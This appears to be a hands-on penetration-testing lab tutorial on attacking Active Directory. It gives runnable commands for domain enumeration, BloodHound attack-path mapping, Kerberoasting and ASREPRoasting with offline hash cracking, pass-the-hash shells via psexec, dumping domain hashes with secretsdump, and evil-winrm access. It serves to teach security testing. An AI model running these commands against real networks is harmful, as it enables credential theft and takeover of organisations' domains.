🎯 Lab Objectives

  • Understand what Active Directory is and how enterprises use it
  • Enumerate users, groups, and computers in an AD domain
  • Use BloodHound to visualise attack paths to Domain Admin
  • Understand and perform Kerberoasting and ASREPRoasting

Step 1 — Active Directory Overview

Active Directory (AD) is Microsoft's directory service used by virtually every enterprise. It manages authentication, authorisation, and policies for Windows networks. Compromising AD means owning the entire organisation.

# AD key components:
# Domain Controller (DC) → the server that runs AD
# Domain             → e.g. corp.local — the AD namespace
# Forest             → collection of one or more domains
# Users/Groups       → security principals
# GPOs               → Group Policy Objects (push config to machines)
# Kerberos           → AD's authentication protocol (tickets not passwords)
# LDAP               → protocol to query AD (port 389/636)

Step 2 — Key Terminology

TermWhat it means
DCDomain Controller — the heart of AD, handles all auth
LDAPProtocol to query AD (port 389 / 636 SSL)
KerberosTicket-based auth protocol AD uses (port 88)
SPNService Principal Name — ties a service to a user account
TGTTicket Granting Ticket — proves who you are to Kerberos
TGSTicket Granting Service — access ticket for a specific service
Domain AdminGroup with full control over the entire domain
krbtgtSpecial account that signs all Kerberos tickets

Step 3 — Initial Recon

# Find the Domain Controller (look for port 88 Kerberos)
nmap -p 88,389,445,3268 192.168.1.0/24
# Machine with 88 open = Domain Controller

# Get domain info with CrackMapExec (null session)
crackmapexec smb 192.168.1.10

# Output shows:
# SMB 192.168.1.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:corp.local)

# Enumerate with valid credentials
crackmapexec smb 192.168.1.10 -u john -p Password123 --users
crackmapexec smb 192.168.1.10 -u john -p Password123 --groups

Step 4 — LDAP Enumeration

# ldapsearch — query AD directly over LDAP
ldapsearch -H ldap://192.168.1.10 -x -b "dc=corp,dc=local"

# Find all users
ldapsearch -H ldap://192.168.1.10 -x -b "dc=corp,dc=local" "(objectClass=user)" sAMAccountName

# ldapdomaindump — dumps everything into HTML reports
sudo apt install python3-ldapdomaindump -y
ldapdomaindump -u 'corp.local\john' -p 'Password123' 192.168.1.10

# Open the generated HTML files:
# domain_users.html    → all users with descriptions (often contain passwords!)
# domain_groups.html   → group memberships
# domain_computers.html → all machines in the domain

Step 5 — BloodHound

BloodHound visualises Active Directory relationships and automatically finds attack paths from your current user to Domain Admin.

# Install BloodHound
sudo apt install bloodhound -y

# Collect data with SharpHound (run on Windows machine in domain)
# Or use BloodHound-python from Kali:
pip3 install bloodhound
bloodhound-python -u john -p Password123 -d corp.local -ns 192.168.1.10 -c all

# Start Neo4j and BloodHound
sudo neo4j start
bloodhound &

# Default Neo4j creds: neo4j / neo4j (change on first login)

# In BloodHound UI:
# 1. Upload the JSON files collected by bloodhound-python
# 2. Search for your current user
# 3. Right-click → "Shortest path to Domain Admins"
# 4. BloodHound draws the exact attack path with each step

# Key BloodHound queries:
# "Find all Domain Admins"
# "Shortest Paths to Domain Admins"
# "Find Principals with DCSync Rights"
# "Users with most local admin rights"

Step 6 — Kerberoasting

Any domain user can request a Kerberos service ticket for any SPN. The ticket is encrypted with the service account's password hash — you can crack it offline.

# Find accounts with SPNs (Kerberoastable accounts)
crackmapexec ldap 192.168.1.10 -u john -p Password123 --kerberoasting output.txt

# GetUserSPNs (Impacket)
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.1.10 -request

# Output — a hash you can crack offline:
$krb5tgs$23$*svc_http$CORP.LOCAL$http/webserver*$a3f4b2...

# Crack it with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

Step 7 — ASREPRoasting

If a user has "Do not require Kerberos preauthentication" enabled, you can request an AS-REP without knowing their password — and crack the encrypted response offline.

# Find ASREP-roastable users
GetNPUsers.py corp.local/ -dc-ip 192.168.1.10 -no-pass -usersfile users.txt

# Output:
$krb5asrep$23$john@CORP.LOCAL:a1b2c3...

# Crack with Hashcat
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt

Step 8 — Pass-the-Hash

# If you have an NTLM hash (from secretsdump, mimikatz, etc.)
# you can authenticate without knowing the plaintext password

# crackmapexec with hash
crackmapexec smb 192.168.1.10 -u administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

# psexec (get a shell)
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.10

# Dump all hashes from a DC (if you are Domain Admin)
secretsdump.py corp.local/administrator:Password123@192.168.1.10

Step 9 — Common AD Attack Paths

AttackRequirementResult
KerberoastingAny domain userService account hash to crack
ASREPRoastingNo credentials neededUser hash to crack
Pass-the-HashNTLM hashAuthenticate as user
DCSyncReplication rightsDump all domain hashes
Golden Ticketkrbtgt hashForge any ticket forever
Silver TicketService account hashForge service tickets

Step 10 — Tools Summary

# Install Impacket (essential AD toolkit)
sudo apt install python3-impacket -y
# Includes: psexec.py, secretsdump.py, GetUserSPNs.py, GetNPUsers.py

# Install Evil-WinRM (Windows Remote Management shell)
sudo gem install evil-winrm
evil-winrm -i 192.168.1.10 -u administrator -p Password123
Lab Complete! Active Directory is the key to enterprise networks. Practice on TryHackMe "AD Basics" and HackTheBox Windows machines to build real skills.
Related: SMB Enumeration → ← All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands